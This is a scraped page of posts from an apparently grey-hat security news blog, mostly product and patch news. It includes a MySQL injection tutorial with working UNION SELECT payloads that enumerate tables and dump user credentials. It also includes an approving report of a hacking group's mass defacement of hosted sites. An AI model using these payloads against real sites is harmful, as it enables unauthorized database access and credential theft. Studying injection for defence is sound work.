Microsoft Releases Windows Server 2012 [Download Now]

Microsoft Releases Windows Server 2012 With Complete Virtualization, Cloud Services, Improved Scalability & Performance [Download Now]

In March this year software giant Microsoft has announced the availability of Windows Server 8, later in April it has been renamed to Windows Server 2012. Windows Server powers many of the worlds' largest datacenters, enables small businesses around the world, and delivers value to organizations of all sizes in between. Windows Server 2012 redefines the server category, delivering hundreds of new features and enhancements spanning virtualization, networking, storage, user experience, cloud computing, automation, and more. Simply put, Windows Server 2012 helps you transform your IT operations to reduce costs and deliver a whole new level of business value. With Windows Server 2012, Microsoft delivers a server platform built on our experience of building and operating many of the world's largest cloud-based services and datacenter. Whether you are setting-up a single server for your small business or architecting a major new datacenter environment, Windows Server 2012 will help you cloud-optimize your IT so you can fully meet your organization's unique needs. 

Features at a Glance:- 

Beyond Virtualization:- Offers a dynamic, multitenant infrastructure to help you scale and secure workloads and build a private cloud. Windows Server 2012 can help you provide:

• Complete Virtualization Platform- A fully-isolated, multitenant environment with tools that can help guarantee service level agreements, enable usage-based chargeback, and support self-service delivery.
• Improved Scalability and Performance- A high-density, scalable environment that you can modify to perform at an optimum level based on your needs.
• Connecting to Cloud Services- A common identity and management framework to enable highly secure and reliable cross-premises connectivity.

The Power of Many Servers, the Simplicity of One:- Delivers a highly available and easy to manage cloud-optimized platform. Windows Server 2012 can help you provide:

• Flexible Storage- Diverse storage choices that can help you achieve high performance, availability, and storage resource efficiency through virtualization and storage conservation.
• Continuous Availability- New and improved features that provide cost-effective, highly available services with protection against a wide range of failure scenarios.
• Management Efficiency- Automation of a broad set of management tasks and simplified deployment of workloads as you move toward full, lights-out automation.

Every App, Any Cloud:- Offers a cloud-optimized server platform that gives you the flexibility to build and deploy applications and websites on-premises, in the cloud, or across both. Windows Server 2012 can help you deliver:

• Flexibility to Build On-Premises and in the Cloud- A consistent set of tools and frameworks that enables developers to build symmetrical or hybrid applications across the datacenter and the cloud.
• A Scalable and Elastic Infrastructure- New features to help you increase website density and efficiency, plus frameworks, services, and tools to increase the scalability and elasticity of modern applications.
• An Open Web and App Development Environment- An open platform that enables mission-critical applications and provides enhanced support for open standards, open-source applications, and various development languages.

Modern Workstyle, Enabled:- Provides users with flexible access to data and applications while simplifying management and maintaining security, control, and compliance. Windows Server 2012 can help you offer:

• Access to Applications and Data from Virtually Anywhere, Any Device- Seamless, on-demand access to virtualized work environments from virtually anywhere.
• A Full Windows Experience Anywhere- A personalized and rich user experience from virtually any device that adapts to different network conditions quickly and responsively.
• Enhanced Data Security and Compliance- Granular access to data and corporate resources based on strong identity, data classification, and centralized policy administration and auditing.

To Download Windows Server 2012 (Both iso & VHD) Click Here

-Source (Microsoft) 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Releases Windows Server 2012 [Download Now]"https://www.voiceofgreyhat.com/2012/09/Microsoft-Releases-Windows-Server-2012-Download-Free.html</a>

VMware vSphere 5 to add cloud virtualization support for Mac OS X Server

The upcoming release of VMware's vSphere 5 virtualization platform is reported to include guest OS support for Mac OS X 10.6 Snow Leopard, indicating new options for enterprise use of Apple's server platform without the now discontinued Xserve.

VMware's plans for the next release of vSphere, as discussed in February at the company's Partner Exchnge conference, have been detailed in a posting by Virtualization.info, including mention of support for Mac OS X Server.

The vSphere product allows companies to build a private of public cloud of pooled infrastructure, offering enterprise planners more flexible capacity management than if they were required to allocate dedicated hardware to every server instance.

The product also helps data center managers to automate disaster recovery plans and monitor and manage performance while accurately reporting the costs needed to provide IT services.

By pooling server hardware, VMware says businesses can reduce their requirements of power, cooling and server storage, cutting energy cost by as much as 80 percent.

Formerly named VMware Infrastructure 4, the cloud-enabled vSphere platform is built upon the company's core virtualization hypervisor called ESXi, which runs as a low level microkernel OS on actual server hardware, and facilitates flexible, virtual deployment of guest OS virtual machines on top, moving around virtual images to use available hardware as necessary.

The product currently supports Microsoft Windows 7, Windows Server 2008, Oracle Solaris 10, as well as enterprise versions of Linux from RedHat, SUSE and Ubuntu. By adding support for Mac OS X Server, VMware will give its enterprise customers an option for virtualizing the deployment of Apple's server features without having to dedicate rack space to Mac hardware.

While Apple has backed out of the dedicated server hardware market, first by discontinuing the Xserve RAID and then by terminating its Xserve rack mounted server, it continues to develop its Mac OS X Server product, with the next major version adding the formerly premium server features to the standard edition.

Mac OS X Server includes WebDAV-based calendar and contact management, easy to use wiki services for building group collaboration tools, and under Mac OS X Lion Server 10.7, will incorporate expanded support for iOS mobile devices, including WebDAV file sharing for iPhone and iPads, expanded Push Notifications for messaging services, and a new Profile Manager that provides setup and management features for iPhone, iPad, iPod touch and Mac OS Lion computers. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">VMware vSphere 5 to add cloud virtualization support for Mac OS X Server"https://www.voiceofgreyhat.com/2011/05/vmware-vsphere-5-to-add-cloud.html</a>

Windows 8 Consumer Preview & Windows Server 8 Beta By Microsoft (Freely Downloadable)

Microsoft Released Windows 8 Consumer Preview & Windows Server 8 Beta (Freely Downloadable)

A double boom for Windows lovers. Software giant Microsoft has officially released the Consumer Preview Windows 8 & Windows Server 8 Beta.

Windows 8 Consumer Preview :-

The Windows 8 Consumer Preview offers a more robust experience for testing the world's most popular operating system and is available to the widest range of people yet following the initial release of the Windows 8 Developer Preview late last year. The Developer Preview received more than 3 million downloads.

"With Windows 8, we reimagined the different ways people interact with their PC and how to make everything feel like a natural extension of the device, whether using a Windows 8 tablet, laptop or all-in-one," said Steven Sinofsky, president of the Windows and Windows Live Division at Microsoft. "The Windows 8 Consumer Preview brings a no-compromises approach to using your PC."

The test "beta" version of the revamped system was introduced at the Mobile World Congress in Barcelona, the planet's largest cell phone trade show, and borrows some of the look of Microsoft's Windows Phone 7 software for Windows 8. Windows 8 doesn't have the traditional "Start" menu, and applications are spread across a mosaic of tiles in a design Microsoft calls "Metro" -- seen as an attempt by the company as a scramble to preserve its market share. And executives said it powers up on PCs in eight seconds, much faster than the previous version.

What is New In Windows 8 Consumer Preview :-

• Broad range of product changes and improvements. Since the Developer Preview in September, designed to preview the programming platform, Windows 8 has progressed across every dimension. From completing the user experience for touch, keyboard and mouse to refining the development platform, the Consumer Preview improves performance, quality and reliability across all subsystems.

• With the added features, it represents a more complete view of the capabilities of Windows 8. Windows Store with new apps. The Windows 8 Consumer Preview marks the beta opening of the Windows Store, which is filled with a variety of new Metro style apps from both third-party developers and Microsoft. During the Consumer Preview, these apps are available to try and experience at no cost to users. The Windows Store will offer personalised recommendations, and Windows 8 gives users the ability to take their apps and settings with them across multiple PCs, making it easy to discover and try new apps while offering developers the greatest opportunity of any platform.

• Connecting to the cloud across Windows-based PCs and Windows Phone 7. The Windows 8 Consumer Preview offers seamless integration with the content people care about across their Web services. An optional additional sign-on with a Microsoft account provides access to a host of features, including the ability to roam all settings, use cloud storage, communicate with email, calendar and contacts, and connect to a broad range of services. Your connection to the cloud works across your Windows-based PCs and your Windows 7 phones.

• Internet Explorer 10 Platform Preview 5. The best way to experience the Web on Windows is with Internet Explorer 10. The browser has been re-imagined to create a new experience designed specifically for Windows 8 devices. It provides an edge-to-edge user interface that is all about less browser and more Web. Fast and fluid, Internet Explorer is hardware-accelerated to enable Web performance.

• Preview of new hardware capabilities. At the event, Microsoft also showcased Windows 8 running on a wide range of new x86- and ARM-based reference hardware. This hardware will be available to select developers for trial and testing as previously announced.

Additional details can be found on the official website of Microsoft Windows. Also Microsoft makes Windows 8 Consumer Preview is made available for free Download

Windows Server 8 Beta :- 

The beta of Windows Server 8 is now available for IT professionals and software developers around the world to download. In the Windows Server official Blog Bill Laing, Corporate Vice President of Microsoft Corporation Said - In September we introduced Windows Server “8” with a preview to help developers and hardware partners prepare new and existing applications, systems and devices. The response from that community, along with hundreds of customers in our early adopters program, has been incredibly positive. A common theme of feedback has been how broad and deep the new capabilities are. Now is the time for you, IT professionals in organizations of all sizes, to get your hands on this new release, discover the new capabilities and contribute to the development of what we call the cloud-optimized OS.
I’ll highlight in this post just a few examples of new capabilities that you’ll want to explore. With the new Hyper-V we are taking virtualization above and beyond to provide a multi-tenant platform for cloud computing. For example, with Hyper-V Network Virtualization you can create virtual networks so different business units, or even multiple customers, can seamlessly share network infrastructure.  You will be able to move virtual machines and servers around without losing their network assignments. In Windows Server “8” we are delivering high availability and disaster recovery through software technology on much more cost effective hardware. For example, with File Server Transparent Failover you can now more easily perform hardware or software maintenance of nodes in a File Server cluster by moving file shares between nodes with little interruption to server applications that are storing data on those file shares. We’re also delivering a tremendous amount of new capabilities for multi-machine management and automation. You will want to explore the dramatic new improvements to Server Manager, as well as the new Windows PowerShell. With 2,300 commandlets provided out of the box, Windows PowerShell allows you to automate everything you can do manually with the user interface. And, with technologies like Intellisense, we’ve made it very easy for you to master all of that power. Additionally, Windows Server “8” provides a powerful server application platform that enables you to develop and host the most demanding of application workloads. For example, with .NET Framework 4.5 you can take advantage of new asynch language and library support to build server and web applications that scale far beyond what other platforms provide. Our new IIS 8 web server provides better security isolation and resource sand-boxing between applications, native support for web sockets, and the ability to host significantly more sites on a server.

For Additional Information & To Download Windows Server 8 Beta Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Windows 8 Consumer Preview & Windows Server 8 Beta By Microsoft (Freely Downloadable)"https://www.voiceofgreyhat.com/2012/03/windows-8-consumer-preview-windows.html</a>

SQL Server 2008 R2 Service Pack 2 (SP2) Released & Available To Download

SQL Server 2008 R2 Service Pack 2 (SP2) Released & Available To Download

The software giant Microsoft announced the availability of SQL Server 2008 R2 Service Pack 2 (SP2). SQL Server 2008 R2 SP2 contains fixes to issues that have been reported through customer feedback platforms and Hotfix solution provided in SQL Server 2008 R2 SP1 Cumulative Update 1 thru to Cumulative Update 5. Service Pack 2 also includes supportability enhancements and issues that have been reported through Windows Error Reporting system. The update fixes several bugs with the product, most notably a problem that could cause a deadlock of the server when synchronising database logs to another server. A bug that prevented users of the JDBC Driver to connect to the server when using JRE 6 update 29, or later, was also fixed. A problem where users receive "incorrect results" when running "a complex query" which contains joins and aggregate functions and uses the DISTINCT statement has been fixed, but Microsoft is not offering any further details on it. Other patches correct false error reports, fix problems with the server's update install mechanism and more.

Both the Service Pack and Feature Pack updates are available for download on the Microsoft Download Center. As part of the continued commitment of Microsoft to software excellence for the customers, this upgrade is free and doesn't require an additional service contract. Microsoft SQL Server 2008 R2 SP2 also addresses a few key customer requests:

• Reporting Services Charts Maybe Zoomed & Cropped 
  Customers using Reporting Services on Windows 7 may sometime find charts are zoomed in and cropped. To work around the issue some customers set ImageConsolidation to false.
• Batch Containing Alter Table not Cached 
  In certain situations with batch files containing the alter table command, the entire batch file is not cached.
• Collapsing Cells or Rows, If Hidden Render Incorrectly 
  Some customers who have hidden rows in their Reporting Services reports may have noticed rendering issues when cells or rows are collapsed. When writing a hidden row, the Style attribute is opened to write a height attribute. If the attribute is empty and the width should not be zero.

Customers are highly encouraged to stay on a supported service pack to ensure they are on the latest and most secure version of SQL Server 2008 R2. The Service Pack is freely available for download from Microsoft's Download Center. We would like to share with you that, earlier in this year Microsoft has released SQL Server 2012 , and the Evaluation edition of SQL Server 2012 is also freely available to download from Microsoft. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">SQL Server 2008 R2 Service Pack 2 (SP2) Released & Available To Download"https://www.voiceofgreyhat.com/2012/08/SQL-Server-2008-R2-SP2-Released.html</a>

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 

                                                                                        

ABSTRACT:

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?

There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.

                                                                                                       
Understand the technique MySQL Injection: 

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP

 

(Figure 1) Detecting

Searching Column number (s): We will test earlier in error, then no error may be said to find.

(Figure 2) SQL Error 

Host Information,

Version of MySQL system used on the server.

(Figure 3) Host Information

(Figure 4) Location of the Files

Current database connection used between the "input" to the MySQL system

(Figure 5) Users of MySQL

(Figure 6) Current Time

Brute Force or Shooting

This happens in versions below 5.x.y

(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--

CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--

COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--

usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--

rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table

* Brute Force / Shooting

This happens in versions below 5.x.y

http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--

_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--

rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=

Dump

This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--

login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--

login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--

passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--

id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--

texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Extracting data from the columns of a given table

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--

_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=

Concat
group_concat() => Search all you want with ascii caracters

concat() => search what you want with ascii caracters

concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.

It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?

The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.

The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

**********

I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 

To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)"https://www.voiceofgreyhat.com/2013/12/we-are-best-tool-for-web-application.html</a>

Mochahost Web Server Rooted, More Than 1250 Sites Hacked By Teamgreyhat

Few days earlier well known hackers group Teamgreyhat has rooted the Guyana Server and thus they hacked more than 1500 websites. Now TGH strikes again, this time another big attack happens. Mochahost Web hosting company's server compromised and more than 1250 websites get hacked by TGH hackers. After this attack TGH authority claimed them selves as the "Achilles of Cyber World". To emphasizes this statement they changed the background music of the hacked page and used the famous quotes of well-known movie Troy. If you dig the history you will find that TGH has already made their own identity on the web by hacking many web servers such as Theexpert Server, Malaysian Web-host, Cybertek Web-Server, 5gbfree.com, Guyana Server and many more. Again this attack proves the strength of TGH. All the hacked sites can be found on a pastebin written by Teamgreyhat. 

Press Release of TGH:- 

"Guyana Server Rooted, 1500 Websites Hacked By Teamgreyhat
T-Series Official Website Hacked By Teamgreyhat (TGH)
Theexpert Server Rooted By TGH
Malaysian Web-Hosting Company's Security Compromised, Entire Server Dumped By TeamGreyhat
Cybertek Web-Server Rooted By TGH 
& & & Many more..............
Yet moooooooooooore to Come.................


The Common question arise and that is who is TGH and what we are capable of???
Here is the Answer


We are TGH 
We are Warriors 
We are Achilles of Cyber World
............
"Remember, I will still be here
As long as you hold me, in your memory


Remember, when your dreams have ended
Time can be transcended 
Just remember me


I am the one star that keeps burning, so brightly,
It is the last light, to fade into the rising sun


I'm with you
Whenever you tell, my story
For I am all I've done


Remember, I will still be here
As long as you hold me, in your memory
Remember me


I am that one voice in the cold wind, that whispers
And if you listen, you'll hear me call across the sky


As long as I still can reach out, and touch you
Then I will never die


Remember, I'll never leave you
If you will only
Remember me


Remember me...


Remember, I will still be here
As long as you hold me
In your memory


Remember, when your dreams have ended
Time can be transcended
I live forever 
Remember me


Remember me
Remember... me..."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Mochahost Web Server Rooted, More Than 1250 Sites Hacked By Teamgreyhat"https://www.voiceofgreyhat.com/2011/12/mochahost-web-server-rooted-more-than.html</a>

Microsoft Releases Patch Fixes for Windows Server and PowerPoint

Microsoft fixed bugs in the WINS name server resolution protocol and a file format vulnerability in PowerPoint for its May Patch Tuesday.

 Microsoft addressed two security bulletins in May’s Patch Tuesday release. Security experts said administrators should apply the fixes immediately—because, despite their small size, they address significant threats.

Microsoft fixed a critical vulnerability affecting Windows Server and an important bug in Microsoft Office PowerPoint, according to the Patch Tuesday advisory released May 10. Microsoft also assigned separate “exploitability” scores for newer versions of the software under the “improved” exploitability index ratings.

The team fixed a critical vulnerability (MS11-035) in the WINS component in Windows Server 2003 and 2008. WINS is a name-resolution service that resolves names in the NetBIOS namespace and does not require authentication to use. While usually not available by default in Windows Server, it is commonly used in the enterprise for internal network servers. Administrators who have enabled WINS in Windows Server should apply the patch immediately as attackers could remotely cause a denial of service, according to Wolfgang Kandek, the CTO of Qualys.

“What might make the WINS vulnerability appealing to attackers is that it is a server-side issue,” Joshua Talbot, security intelligence manager, Symantec Security Response, told eWEEK.

Unlike other threats, attackers don’t have to trick a user into doing anything since it’s just a matter of finding a vulnerable server and feeding the machine “a malicious string of data,” according to Talbot. It is also a more serious issue on Windows Server 2003 than on 2008 because Windows Server 2008 has built-in protections such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). However, attackers can still create exploit code to get past those security features, Talbot said.

The other “important” bulletin (MS11-036) addressed a security flaw in all versions of Microsoft Office Power Point except Office 2010. The bug would allow attackers to take full control of the target machine as soon as the user opens a malicious PPT file.

Both WINS and PowerPoint vulnerabilities are fairly significant, according to Tyler Reguly, technical manager of security research and development at nCircle. File-format vulnerabilities are “popular exploits” but WINS is remote code execution, so it was “difficult” to decide which was the “biggest risk today.”

Microsoft listed both vulnerabilities using the new exploitability ratings. The PowerPoint bulletin was rated a “1” for a consistent exploit code likely for older software releases, but 0 for latest software because Office 2010 is not affected. The WINS patch was rated a “2” on both the latest and older versions because it affected all versions.

The updated rating system is intended to make it easier for IT administrators to determine their risk level, according to Microsoft.

“With massive updates such as we had in April, it’s easy to get overwhelmed. Microsoft’s new index simplifies the process, which will help IT administrators to prioritize which patches they tackle first,” said Dave Marcus, director of security research and communications at McAfee Labs.

The small release means administrators should “brace themselves for a larger update” in June, according to Kandek.

To complicate things for IT administrators, a fake Patch Tuesday update is making the rounds, according to security researchers at Websense Security Labs ThreatSeeker network. The malware is spread via a link inside an email message supposedly from “Microsoft Canada Co.” which informs users that Microsoft has issued a “Security Update for Microsoft Windows OS,” wrote Amon Sanniez, associate security researcher at Websense. Clicking on the link downloads the fake patch to the computer and infects the system with a Zeus Trojan variant, according to Sanniez.

It “ties in almost perfectly” with the real Patch Tuesday updates from Microsoft, Sanniez said.

The email looks quite legitimate and shows “some effort” went into the creation, as the message is presented in both English and French, and the display names within the headers actually say the mail originated from Microsoft Canada.

The malicious executable is currently not being detected by most major antivirus products tracked on VirusTotal, so IT managers should be careful that none of their staff members or users click on the link to get the security update. Websense said it is a low-volume threat, possibly aimed at a handful of companies. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Releases Patch Fixes for Windows Server and PowerPoint"https://www.voiceofgreyhat.com/2011/05/microsoft-releases-patch-fixes-for.html</a>

Oracle to Mitigate 73 Security Vulnerabilities in Upcoming Critical Patch Update

Oracle is all set for the upcoming critical patch update. The pre-release announcement by the company indicates that in all 73 vulnerabilities associated with numerous products will be mitigated during the next critical patch update. The update will mitigate security vulnerabilities associated with Oracle database server, fusion middleware, enterprise manager, e-business suite, supply chain products, PeopleSoft, JD Edwards suite, Siebel CRM, industry applications, Sun products and Open office suite.

The company releases quarterly critical patch updates on Tuesday closest to 17th day of January, April, July and October. The company uses Common Vulnerability Scoring System (CVSS) version 2.0 to rate vulnerabilities. The vulnerabilities are assigned scores based on the prerequisites for exploiting the vulnerability, ease of exploit, and impact of the attack on availability, confidentiality and integrity. Base scores range from 0.0 to 10.0 with ten being the most severe vulnerability.

Vulnerabilities may be caused by technological flaws, programming errors, and other human errors. Developers are required constantly upgrade their technical skills through online IT degree courses, training programs and refresher courses to deal with ever evolving threats.

The critical patch update will address six vulnerabilities in database server. The vulnerabilities affect components such as application service level management, database vault, Oracle help, security service, warehouse builder, UIX and network foundation. Two of the six vulnerabilities do not require authentication for exploitation of vulnerabilities. Highest base score for security flaws affecting database server is 6.5. The update will mitigate 9 flaws associated with fusion middleware, 6 of which are exploitable without authentication.

The vulnerabilities affect Oracle help, HTTP server, JRockit, outside In technology, security service, WebLogic server, portal and single sign on. Oracle has assigned highest severity score of 10 for vulnerabilities affecting fusion middleware. 4 vulnerabilities will be fixed in Oracle applications, 2 of which are exploitable without authentication. The vulnerabilities have been assigned a base score of 4.3 and affect application object library, applications install, and web ADI. The update will resolve a flaw in Supply chain products suite, which is exploitable without authentication. Highest base score for vulnerability in supply chain products suite is 4.3 and affects Agile technology program.

14 security flaws have related to PeopleSoft Suite will be fixed in the upcoming critical patch, 1 of which is exploitable without authentication. Highest base score for security flaws associated with PeopleSoft suite is 4.3 and affects PeopleSoft Enterprise, Enterprise CRM, ELS, HRMS and People tools. The critical patch update will resolve 8 issues associated with JD Edwards suite, 7 of which are exploitable without authentication. Highest base score for vulnerabilities in JD Edwards suite is 6.4 and affects EnterpriseOne tools.

The update will address a vulnerability associated with industry applications, which affects InForm. Highest base score for vulnerability in industry applications is 5.5. 8 security flaws will be mitigated in Sun products suite, seven of which are exploitable without authentication. Oracle has assigned highest severity score of 10 for security flaws affecting Sun products suite. The components affected include Java Dynamic Management Kit, Java system web server, Solaris, OpenSSO Enterprise, GlassFish Enterprise server, java system application server, java system access manager policy agent, and java system messaging server.

The upcoming critical patch update will fix 8 security issues related to Open Office suite, of which 7 are exploitable without authentication. Highest base score for security flaws in Open Office suite is 9.3. Open Office, StarOffice and StarSuite are affected by the vulnerabilities.

Vulnerabilities are identified by professionals qualified in IT degree programs and security certifications such as penetration testing. Developers encourage both in-house and independent security researchers to detect and report security flaws so that they can be mitigated before exploitation by attackers.

Online IT courses, e-tutorials, security blogs and alerts from computer emergency response teams could help users in gaining insights on security threats, their implications and importance of security updates. Users must keep track of the security releases and install necessary updates to safeguard their systems and data from unauthorized access. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Oracle to Mitigate 73 Security Vulnerabilities in Upcoming Critical Patch Update"https://www.voiceofgreyhat.com/2011/04/oracle-to-mitigate-73-security.html</a>

Apache Web Server Under Stealth Attack

 

Online attackers seem to love to exploit Web servers, because they can add scripts that quickly and automatically add malicious links to static HTML pages via an iFrame tag, or code that attempts to exploit website visitors' PCs via drive-by downloads. But an attack discovered on Friday, dubbed Apmod, pushes this attack technique one step further by not just infecting static Web pages. "The attack was unusual in that the Web server itself was the infection target," said Cathal Mullaney, a security response engineer at Symantec, in a blog post. "When a Web server is infected like this, every user that requests any Web page from that Web server is a potential victim. This is opposed to cases where static Web pages are infected with malicious code--only those specific pages put a user at risk of infection."

This new attack, which has been seen in the wild but doesn't currently appear to be widespread, targets the popular Apache Web Server, which runs on Windows and Linux. According to Netcraft, Apache Web Server is now used to host about 204 million websites.

The attack is innovative in that it uses Apache's built-in filter capabilities. A filter, as defined by Apache, "is a process that is applied to data that is sent or received by the server," and can be used to add functionality without rewriting the code base. Many websites use this capability to add advertisements to Web pages on the fly, while also tracking that advertising delivery to generate revenue via ad agencies.

"We have discovered a malicious module that performs identical steps in order to include links to malicious websites," said Mullaney. "All of the actions performed by the rogue module are done using legitimate code provided by the Apache API, specifically for this type of on-the-fly content generation. This is not an exploit or a hack of Apache's code base; the module uses Apache's inherent functionality to infect users and attempts to redirect them to a malicious Web page."

